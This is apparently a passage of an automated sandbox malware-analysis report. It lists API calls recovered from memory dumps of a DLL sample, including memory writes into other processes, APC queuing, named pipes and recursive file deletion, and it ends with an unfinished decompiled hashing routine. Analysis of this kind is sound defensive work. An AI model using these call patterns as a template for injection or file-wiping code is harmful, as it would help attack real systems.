                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14D20
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14D52
                • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 01C14E51
                • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 01C14E65
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: 9f0bf6660229e962624a579bd1c09231b82e887bb9d354d1fea213133da07f84
                • Instruction ID: 2e20aa88cbb809ee21957aaa01d539197fe6adc532f2d758d8269eb092e62d85
                • Opcode Fuzzy Hash: 9f0bf6660229e962624a579bd1c09231b82e887bb9d354d1fea213133da07f84
                • Instruction Fuzzy Hash: C781C774680255EBDB25EBB8C984E9F7BE9BB6B700B640915E106D310DEB36D604FB20
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CD4AA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,00000000,?,046C1FAD,?), ref: 046CD4BB
                  • Part of subcall function 046CD4AA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,046C1FAD,?), ref: 046CD4D8
                • FreeLibrary.KERNEL32(?), ref: 046CB2C6
                  • Part of subcall function 046CD95E: lstrlenW.KERNEL32(?,00000000,?,?,?,046CB20B,?,?), ref: 046CD96B
                  • Part of subcall function 046CD95E: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,046CB20B,?,?), ref: 046CD994
                  • Part of subcall function 046CD95E: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 046CD9B4
                  • Part of subcall function 046CD95E: lstrcpyW.KERNEL32(-00000002,?), ref: 046CD9CF
                  • Part of subcall function 046CD95E: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,046CB20B,?,?), ref: 046CD9DB
                  • Part of subcall function 046CD95E: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,046CB20B,?,?), ref: 046CD9DE
                  • Part of subcall function 046CD95E: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,046CB20B,?,?), ref: 046CD9EA
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA07
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA21
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA37
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA4D
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA63
                  • Part of subcall function 046CD95E: GetProcAddress.KERNEL32(00000000,?), ref: 046CDA79
                • FindFirstFileW.KERNEL32(?,?,?,?), ref: 046CB21C
                • lstrlenW.KERNEL32(?), ref: 046CB238
                • lstrlenW.KERNEL32(?), ref: 046CB250
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • lstrcpyW.KERNEL32(00000000,?), ref: 046CB269
                • lstrcpyW.KERNEL32(00000002), ref: 046CB27E
                  • Part of subcall function 046E5B2E: lstrlenW.KERNEL32(?,00000000,74E48250,74E069A0,?,?,?,046CB28E,?,00000000,00000001), ref: 046E5B3E
                  • Part of subcall function 046E5B2E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,046CB28E,?,00000000,00000001), ref: 046E5B60
                  • Part of subcall function 046E5B2E: lstrcpyW.KERNEL32(00000000,?), ref: 046E5B8C
                  • Part of subcall function 046E5B2E: lstrcatW.KERNEL32(00000000,?), ref: 046E5B9F
                • FindNextFileW.KERNEL32(?,00000010), ref: 046CB2A6
                • FindClose.KERNEL32(00000002), ref: 046CB2B4
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                • String ID:
                • API String ID: 1209511739-0
                • Opcode ID: dfec0531100968008ebecdaaba3813e3f856f22b10be5d821bf233f4af65b1f6
                • Instruction ID: af7205e71675a5bc09d13fad313079669d72f420fed279aaf9d7c358944027b2
                • Opcode Fuzzy Hash: dfec0531100968008ebecdaaba3813e3f856f22b10be5d821bf233f4af65b1f6
                • Instruction Fuzzy Hash: 2B4148314043069FD710EF61EC49A7FBBE8FB84B09F04092DF58496250EB39E908CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,00000000), ref: 046CB30F
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 046CB378
                • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 046CB3A0
                • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 046CB3F2
                • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 046CB3FD
                • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 046CB410
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                • String ID:
                • API String ID: 499515686-0
                • Opcode ID: 718b6f70848567fddaffa8979db01b0778f445720458a5292a30d0a012904690
                • Instruction ID: f5f2a450955be92f6dd7350d6b69c8e85ae9be3b373c5d0bf7d6a0c72b75b867
                • Opcode Fuzzy Hash: 718b6f70848567fddaffa8979db01b0778f445720458a5292a30d0a012904690
                • Instruction Fuzzy Hash: 4F414870900209EFDF10AFA1EC49ABE7BB9FF10744F508069EA01A7150F774BA44DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046D6331
                  • Part of subcall function 046E3E7D: NtAllocateVirtualMemory.NTDLL(046D6359,00000000,00000000,046D6359,00003000,00000040), ref: 046E3EAE
                  • Part of subcall function 046E3E7D: RtlNtStatusToDosError.NTDLL(00000000), ref: 046E3EB5
                  • Part of subcall function 046E3E7D: SetLastError.KERNEL32(00000000), ref: 046E3EBC
                • GetLastError.KERNEL32(?,00000318,00000008), ref: 046D6441
                  • Part of subcall function 046CECE9: RtlNtStatusToDosError.NTDLL(00000000), ref: 046CED01
                • memcpy.NTDLL(00000218,046E6DD0,00000100,?,00010003,?,?,00000318,00000008), ref: 046D63C0
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 046D641A
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                • String ID:
                • API String ID: 2966525677-3916222277
                • Opcode ID: 36b73cedeccf207e95e76981cf94d75bb0612ec051a82429cd61f0168c833a04
                • Instruction ID: fa9525d1bdc891873e0614cb84aa7f5d16aa077c61b5d037fed5dac37ba95a46
                • Opcode Fuzzy Hash: 36b73cedeccf207e95e76981cf94d75bb0612ec051a82429cd61f0168c833a04
                • Instruction Fuzzy Hash: 51314F71A01309AFEB20DF65D985AAEB7F8EB18308F10856EE505E7240F774FE458B50
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset$memcpy
                • String ID:
                • API String ID: 368790112-0
                • Opcode ID: b0deb4d59b893f6d11687a3e0bab061144338cfc3394c2e361e8d84620414ec6
                • Instruction ID: eacde1ca6cf046dd7ced44efa628e3c52a802941616944a55061f86cbdf59f15
                • Opcode Fuzzy Hash: b0deb4d59b893f6d11687a3e0bab061144338cfc3394c2e361e8d84620414ec6
                • Instruction Fuzzy Hash: E2F10430601BA9CFCB31CF6AC5946BABBF0BF52304F244D6DC6D696642E271BA45CB10
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,046DE937,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046D655E
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D6573
                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046D658F
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D65A4
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D65B8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: LibraryLoad$AddressProc
                • String ID:
                • API String ID: 1469910268-0
                • Opcode ID: b7e10f37c4a95d279e25023942cd085b9629edbb303da38dde67d7d6337131d0
                • Instruction ID: a4d1448354cb2643cfd5ae8e475145a0f1c023e6f267af37d2ef996ee3bf3ce0
                • Opcode Fuzzy Hash: b7e10f37c4a95d279e25023942cd085b9629edbb303da38dde67d7d6337131d0
                • Instruction Fuzzy Hash: A9318B32A012129FDB00CF6AE985A9633E9FB49310B41106AE609DF355F77AFC828F45
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 046C3F14
                • lstrlenW.KERNEL32(?), ref: 046C3F22
                • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 046C3F4D
                • lstrcpyW.KERNEL32(00000006,00000000), ref: 046C3F7A
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Query$lstrcpylstrlen
                • String ID:
                • API String ID: 3961825720-0
                • Opcode ID: aca5a819906411dcbc11784674fc32e52472c4f56eb1e4c213a7c66c3906dfb0
                • Instruction ID: 9f673a415da17933a386d070971294a5aaa26b70875d6407a2e9aa5f32c24215
                • Opcode Fuzzy Hash: aca5a819906411dcbc11784674fc32e52472c4f56eb1e4c213a7c66c3906dfb0
                • Instruction Fuzzy Hash: 59414A71500209FFEF11DFA9C984AAEBBB8EF14304F108469F915AB250E775EA519BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,046EE268,00000001), ref: 046CDB68
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CDBB3
                  • Part of subcall function 046D9DC6: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,046D2BEA), ref: 046D9DDD
                  • Part of subcall function 046D9DC6: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 046D9DF2
                  • Part of subcall function 046D9DC6: GetLastError.KERNEL32(00000000), ref: 046D9DFD
                  • Part of subcall function 046D9DC6: TerminateThread.KERNEL32(00000000,00000000), ref: 046D9E07
                  • Part of subcall function 046D9DC6: CloseHandle.KERNEL32(00000000), ref: 046D9E0E
                  • Part of subcall function 046D9DC6: SetLastError.KERNEL32(00000000), ref: 046D9E17
                • GetLastError.KERNEL32(046D5628,00000000,00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CDB9B
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,046C8D64,?,?,?,?,?), ref: 046CDBAB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                • String ID:
                • API String ID: 1700061692-0
                • Opcode ID: d3655280b43c988314d8a63007404d1f3d7e692ca0c5866b6665d80428218478
                • Instruction ID: 0f0a5549777d93066c9dde8229dd61cdb75928553e9f3fee7494c13ae8ccad59
                • Opcode Fuzzy Hash: d3655280b43c988314d8a63007404d1f3d7e692ca0c5866b6665d80428218478
                • Instruction Fuzzy Hash: 73F0A4B0345211BFE3A42A7A9CC8E767798DB95334B100239F512C72C0F6651C0289B4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 046DA210
                • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 046DA250
                  • Part of subcall function 046D70AC: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,046D63FB,00000000,?,046D63FB,?,00000000,00000000,00000318,00000020,?,00010003,?), ref: 046D70CA
                • RtlNtStatusToDosError.NTDLL(00000000), ref: 046DA259
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                • String ID:
                • API String ID: 4036914670-0
                • Opcode ID: 046dcf4066738aba0fa3acf0c5d8a684dee257f21d836c043e0f4ef4e72b349f
                • Instruction ID: 5fdb377a45ca76ae3dc46863b91a52eb4dc21d899ed51bdb4c31e95bfdc5c0b2
                • Opcode Fuzzy Hash: 046dcf4066738aba0fa3acf0c5d8a684dee257f21d836c043e0f4ef4e72b349f
                • Instruction Fuzzy Hash: E801E475A04108FEEB11AEE6DC45EAEBBBDEB88700F040029FA01E6155F775E9019B60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 046E25B9
                • RtlNtStatusToDosError.NTDLL(C000009A), ref: 046E25F0
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorFreeHeapInformationQueryStatusSystem
                • String ID:
                • API String ID: 2533303245-0
                • Opcode ID: 6107da1662317ee4495f403f891acbf35d2757354d27cc9b5209bc654e349518
                • Instruction ID: e15f7c6c755e81255f1a372cc12ba4f4aeeb05d831322f59784e66e694d0b178
                • Opcode Fuzzy Hash: 6107da1662317ee4495f403f891acbf35d2757354d27cc9b5209bc654e349518
                • Instruction Fuzzy Hash: 61012632903120AFD7215B56CE38ABFBAAEDF95B51F020058ED01A7200FB70AE0186E0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046DF0EB
                • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 046DF103
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: InformationProcessQuerymemset
                • String ID:
                • API String ID: 2040988606-0
                • Opcode ID: 8136a7eafff47edbf71fbfc8925fe417f4fba8219174408e558e10ad300412c6
                • Instruction ID: dc7df9785d7327bf84a9f938586a68f2a623d86d2346e6799ab436c6737bc462
                • Opcode Fuzzy Hash: 8136a7eafff47edbf71fbfc8925fe417f4fba8219174408e558e10ad300412c6
                • Instruction Fuzzy Hash: 03F0687194025C7AEB10EB91CC05FDE7BBCEB04740F004064EE05E6181E370EB558BA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlNtStatusToDosError.NTDLL(C0000002), ref: 046D5988
                • SetLastError.KERNEL32(00000000,?,046D4C11,?,00000000,00000000,00000004,?,00000000,00000000,74E04EE0,00000000), ref: 046D598F
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Error$LastStatus
                • String ID:
                • API String ID: 4076355890-0
                • Opcode ID: 78fa53dc5654f3ca7dda1a3ad5ce7eef60e06d6c0e5867249780fbfab94b9d3e
                • Instruction ID: f16433a673a40b59ad991ac05ff64f44332cfb984d59a86224c212203c78a595
                • Opcode Fuzzy Hash: 78fa53dc5654f3ca7dda1a3ad5ce7eef60e06d6c0e5867249780fbfab94b9d3e
                • Instruction Fuzzy Hash: 21E0123260015ABFCF015FD59C04D9A7F99EB08750B005010BA01DB120E635DC61ABA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046C6C8A
                • memset.NTDLL ref: 046C6C99
                  • Part of subcall function 046D6C01: memset.NTDLL ref: 046D6C12
                  • Part of subcall function 046D6C01: memset.NTDLL ref: 046D6C1E
                  • Part of subcall function 046D6C01: memset.NTDLL ref: 046D6C49
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: b141997f1875c5d536a83d4a0f07464cfa1e4f11872701ed3972f755f0e405b5
                • Instruction ID: 14ae1eb1638fde5eaef418aa114d949849bab94a9370147274b3541417848085
                • Opcode Fuzzy Hash: b141997f1875c5d536a83d4a0f07464cfa1e4f11872701ed3972f755f0e405b5
                • Instruction Fuzzy Hash: B0021070601B618FCB75CF29C680566BBF1FF547147609E2ED6E786A90E231F881CB18
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 50%
                			E01C1436E(void* __ecx, intOrPtr* _a4) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				void _v76;
                				intOrPtr* _t226;
                				signed int _t229;
                				signed int _t231;
                				signed int _t233;
                				signed int _t235;
                				signed int _t237;
                				signed int _t239;
                				signed int _t241;
                				signed int _t243;
                				signed int _t245;
                				signed int _t247;
                				signed int _t249;
                				signed int _t251;
                				signed int _t253;
                				signed int _t255;
                				signed int _t257;
                				signed int _t259;
                				signed int _t274;
                				signed int _t337;
                				void* _t347;
                				signed int _t348;
                				signed int _t350;
                				signed int _t352;
                				signed int _t354;
                				signed int _t356;
                				signed int _t358;
                				signed int _t360;
                				signed int _t362;
                				signed int _t364;
                				signed int _t366;
                				signed int _t375;
                				signed int _t377;
                				signed int _t379;
                				signed int _t381;
                				signed int _t383;
                				intOrPtr* _t399;
                				signed int _t407;
                				signed int _t409;
                				signed int _t411;
                				signed int _t413;
                				signed int _t415;
                				signed int _t417;
                				signed int _t419;
                				signed int _t421;
                				signed int _t423;
                				signed int _t425;
                				signed int _t427;
                				signed int _t429;
                				signed int _t437;
                				signed int _t439;
                				signed int _t441;
                				signed int _t443;
                				signed int _t445;
                				void* _t447;
                				signed int _t507;
                				signed int _t598;
                				signed int _t606;
                				signed int _t612;
                				signed int _t678;
                				signed int* _t681;
                				signed int _t682;
                				signed int _t684;
                				signed int _t689;
                				signed int _t691;
                				signed int _t696;
                				signed int _t698;
                				signed int _t717;
                				signed int _t719;
                				signed int _t721;
                				signed int _t723;
                				signed int _t725;
                				signed int _t727;
                				signed int _t733;
                				signed int _t739;
                				signed int _t741;
                				signed int _t743;
                				signed int _t745;
                				signed int _t747;
                
                				_t226 = _a4;
                				_t347 = __ecx + 2;
                				_t681 =  &_v76;
                				_t447 = 0x10;
                				do {
                					_t274 =  *(_t347 - 1) & 0x000000ff;
                					_t347 = _t347 + 4;
                					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                					_t681 =  &(_t681[1]);
                					_t447 = _t447 - 1;
                				} while (_t447 != 0);
                				_t6 = _t226 + 4; // 0x14eb3fc3
                				_t682 =  *_t6;
                				_t7 = _t226 + 8; // 0x8d08458b
                				_t407 =  *_t7;
                				_t8 = _t226 + 0xc; // 0x56c1184c
                				_t348 =  *_t8;
                				asm("rol eax, 0x7");
                				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                				asm("rol ecx, 0xc");
                				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                				asm("ror edx, 0xf");
                				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                				asm("ror esi, 0xa");
                				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                				_v8 = _t684;
                				_t689 = _v8;
                				asm("rol eax, 0x7");
                				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                				asm("rol ecx, 0xc");
                				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                				asm("ror edx, 0xf");
                				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                				asm("ror esi, 0xa");
                				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                				_v8 = _t691;
                				_t696 = _v8;
                				asm("rol eax, 0x7");
                				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                				asm("rol ecx, 0xc");
                				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                				asm("ror edx, 0xf");
                				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                				asm("ror esi, 0xa");
                				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                				_v8 = _t698;
                				asm("rol eax, 0x7");
                				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                				asm("rol ecx, 0xc");
                				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                				_t507 =  !_t356;
                				asm("ror edx, 0xf");
                				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                				_v12 = _t415;
                				_v12 =  !_v12;
                				asm("ror esi, 0xa");
                				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                				asm("rol eax, 0x5");
                				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                				asm("rol ecx, 0x9");
                				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                				asm("rol edx, 0xe");
                				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                				asm("ror esi, 0xc");
                				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                				asm("rol eax, 0x5");
                				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                				asm("rol ecx, 0x9");
                				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                				asm("rol edx, 0xe");
                				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                				asm("ror esi, 0xc");
                				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                				asm("rol eax, 0x5");
                				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                				asm("rol ecx, 0x9");
                				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                				asm("rol edx, 0xe");
                				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                				asm("ror esi, 0xc");
                				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                				asm("rol eax, 0x5");
                				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                				asm("rol ecx, 0x9");
                				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                				asm("rol edx, 0xe");
                				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                				asm("ror esi, 0xc");
                				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                				asm("rol eax, 0x4");
                				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                				asm("rol ecx, 0xb");
                				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                				asm("rol edx, 0x10");
                				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                				_t598 = _t366 ^ _t425;
                				asm("ror esi, 0x9");
                				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                				asm("rol eax, 0x4");
                				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                				asm("rol edi, 0xb");
                				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                				asm("rol edx, 0x10");
                				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                				_t337 = _t606 ^ _t427;
                				asm("ror ecx, 0x9");
                				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                				asm("rol eax, 0x4");
                				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                				asm("rol esi, 0xb");
                				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                				asm("rol edi, 0x10");
                				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                				_t429 = _t733 ^ _t612;
                				asm("ror ecx, 0x9");
                				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                				asm("rol eax, 0x4");
                				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                				asm("rol edx, 0xb");
                				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                				asm("rol esi, 0x10");
                				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                				asm("ror ecx, 0x9");
                				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                				asm("rol eax, 0x6");
                				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                				asm("rol edx, 0xa");
                				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                				asm("rol esi, 0xf");
